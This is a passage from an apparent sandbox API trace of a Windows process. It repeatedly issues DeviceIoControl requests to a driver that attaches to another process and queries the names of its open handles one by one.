PriorityBoost=0) [0186.211] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.211] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.211] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0186.211] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.211] PsAcquireProcessExitSynchronization () returned 0x0 [0186.211] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.211] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003771f60, HandleInformation=0x0) returned 0x0 [0186.212] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.212] PsReleaseProcessExitSynchronization () returned 0x2 [0186.212] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.212] ObQueryNameString (in: Object=0xfffffa8003771f60, ObjectNameInfo=0xfffffa800317e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.212] ObfDereferenceObject (Object=0xfffffa8003771f60) returned 0x15 [0186.212] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.212] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.212] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.212] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0186.212] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.212] PsAcquireProcessExitSynchronization () returned 0x0 [0186.212] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.212] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a00116fad0, HandleInformation=0x0) returned 0x0 [0186.213] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.213] PsReleaseProcessExitSynchronization () returned 0x2 [0186.213] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.213] ObQueryNameString (in: Object=0xfffff8a00116fad0, ObjectNameInfo=0xfffffa8003145044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003145044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.213] ObfDereferenceObject (Object=0xfffff8a00116fad0) returned 0x1 [0186.213] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.213] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.213] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.213] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.213] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.213] PsAcquireProcessExitSynchronization () returned 0x0 [0186.213] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.213] ObReferenceObjectByHandle (in: Handle=0x34, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80020cce60, HandleInformation=0x0) returned 0x0 [0186.214] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.214] PsReleaseProcessExitSynchronization () returned 0x2 [0186.214] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.214] ObQueryNameString (in: Object=0xfffffa80020cce60, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.214] ObfDereferenceObject (Object=0xfffffa80020cce60) returned 0x1 [0186.214] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.214] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.214] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.214] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.214] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.214] PsAcquireProcessExitSynchronization () returned 0x0 [0186.214] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.214] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800213e390, HandleInformation=0x0) returned 0x0 [0186.214] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.215] PsReleaseProcessExitSynchronization () returned 0x2 [0186.215] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.215] ObQueryNameString (in: Object=0xfffffa800213e390, ObjectNameInfo=0xfffffa8003143044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003143044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.215] ObfDereferenceObject (Object=0xfffffa800213e390) returned 0x1 [0186.215] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.215] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.215] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.215] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.215] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.216] PsAcquireProcessExitSynchronization () returned 0x0 [0186.216] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.216] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e86d00, HandleInformation=0x0) returned 0x0 [0186.216] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.216] PsReleaseProcessExitSynchronization () returned 0x2 [0186.216] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.216] ObQueryNameString (in: Object=0xfffffa8001e86d00, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.216] ObfDereferenceObject (Object=0xfffffa8001e86d00) returned 0x1 [0186.216] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.216] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.216] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.216] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.217] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.217] PsAcquireProcessExitSynchronization () returned 0x0 [0186.217] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.217] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e86120, HandleInformation=0x0) returned 0x0 [0186.217] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.217] PsReleaseProcessExitSynchronization () returned 0x2 [0186.217] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.217] ObQueryNameString (in: Object=0xfffffa8001e86120, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.217] ObfDereferenceObject (Object=0xfffffa8001e86120) returned 0x1 [0186.217] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.217] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.217] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.217] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.217] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.217] PsAcquireProcessExitSynchronization () returned 0x0 [0186.217] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.218] ObReferenceObjectByHandle (in: Handle=0x44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80020ccdd0, HandleInformation=0x0) returned 0x0 [0186.218] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.218] PsReleaseProcessExitSynchronization () returned 0x2 [0186.218] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.218] ObQueryNameString (in: Object=0xfffffa80020ccdd0, ObjectNameInfo=0xfffffa8003149044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003149044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.218] ObfDereferenceObject (Object=0xfffffa80020ccdd0) returned 0x1 [0186.218] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.218] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.218] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.218] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.218] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.218] PsAcquireProcessExitSynchronization () returned 0x0 [0186.218] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.218] ObReferenceObjectByHandle (in: Handle=0x48, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80020ccd50, HandleInformation=0x0) returned 0x0 [0186.219] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.219] PsReleaseProcessExitSynchronization () returned 0x2 [0186.219] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.219] ObQueryNameString (in: Object=0xfffffa80020ccd50, ObjectNameInfo=0xfffffa800314a044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314a044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.219] ObfDereferenceObject (Object=0xfffffa80020ccd50) returned 0x1 [0186.219] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.219] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.219] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.219] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.219] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.219] PsAcquireProcessExitSynchronization () returned 0x0 [0186.219] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.219] ObReferenceObjectByHandle (in: Handle=0x4c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003810ad0, HandleInformation=0x0) returned 0x0 [0186.219] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.220] PsReleaseProcessExitSynchronization () returned 0x2 [0186.220] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.220] ObQueryNameString (in: Object=0xfffffa8003810ad0, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.220] ObfDereferenceObject (Object=0xfffffa8003810ad0) returned 0x1 [0186.220] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.220] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.220] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.220] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0186.220] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.220] PsAcquireProcessExitSynchronization () returned 0x0 [0186.220] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.220] ObReferenceObjectByHandle (in: Handle=0x50, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a004438eb0, HandleInformation=0x0) returned 0x0 [0186.220] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.220] PsReleaseProcessExitSynchronization () returned 0x2 [0186.221] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.221] ObQueryNameString (in: Object=0xfffff8a004438eb0, ObjectNameInfo=0xfffffa800314c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.221] ObfDereferenceObject (Object=0xfffff8a004438eb0) returned 0x8d [0186.221] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.221] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.221] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.221] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.221] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.221] PsAcquireProcessExitSynchronization () returned 0x0 [0186.221] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.221] ObReferenceObjectByHandle (in: Handle=0x54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002801380, HandleInformation=0x0) returned 0x0 [0186.221] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.221] PsReleaseProcessExitSynchronization () returned 0x2 [0186.221] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.222] ObQueryNameString (in: Object=0xfffffa8002801380, ObjectNameInfo=0xfffffa800314d044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314d044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.222] ObfDereferenceObject (Object=0xfffffa8002801380) returned 0x1 [0186.222] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.222] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.222] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.222] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.222] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.222] PsAcquireProcessExitSynchronization () returned 0x0 [0186.222] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.222] ObReferenceObjectByHandle (in: Handle=0x58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003270ae0, HandleInformation=0x0) returned 0x0 [0186.222] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.222] PsReleaseProcessExitSynchronization () returned 0x2 [0186.222] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.222] ObQueryNameString (in: Object=0xfffffa8003270ae0, ObjectNameInfo=0xfffffa800314e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800314e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.222] ObfDereferenceObject (Object=0xfffffa8003270ae0) returned 0x1 [0186.223] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.223] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.223] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.223] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0186.223] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.223] PsAcquireProcessExitSynchronization () returned 0x0 [0186.223] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.223] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80037a0a20, HandleInformation=0x0) returned 0x0 [0186.223] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.223] PsReleaseProcessExitSynchronization () returned 0x2 [0186.223] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.223] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff88002aab508 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff88002aab508) returned 0x0 [0186.223] ObfDereferenceObject (Object=0xfffffa80037a0a20) returned 0x1 [0186.223] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.223] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.224] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.224] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.224] PsAcquireProcessExitSynchronization () returned 0x0 [0186.224] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.224] ObReferenceObjectByHandle (in: Handle=0x60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80034b38a0, HandleInformation=0x0) returned 0x0 [0186.224] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.224] PsReleaseProcessExitSynchronization () returned 0x2 [0186.224] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.224] ObQueryNameString (in: Object=0xfffffa80034b38a0, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.224] ObfDereferenceObject (Object=0xfffffa80034b38a0) returned 0x1 [0186.224] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.224] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.224] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.224] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.225] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.225] PsAcquireProcessExitSynchronization () returned 0x0 [0186.225] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.225] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80034b3820, HandleInformation=0x0) returned 0x0 [0186.225] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.225] PsReleaseProcessExitSynchronization () returned 0x2 [0186.225] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.225] ObQueryNameString (in: Object=0xfffffa80034b3820, ObjectNameInfo=0xfffffa8003151044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003151044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.225] ObfDereferenceObject (Object=0xfffffa80034b3820) returned 0x1 [0186.225] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.225] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.225] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.225] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.225] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.226] 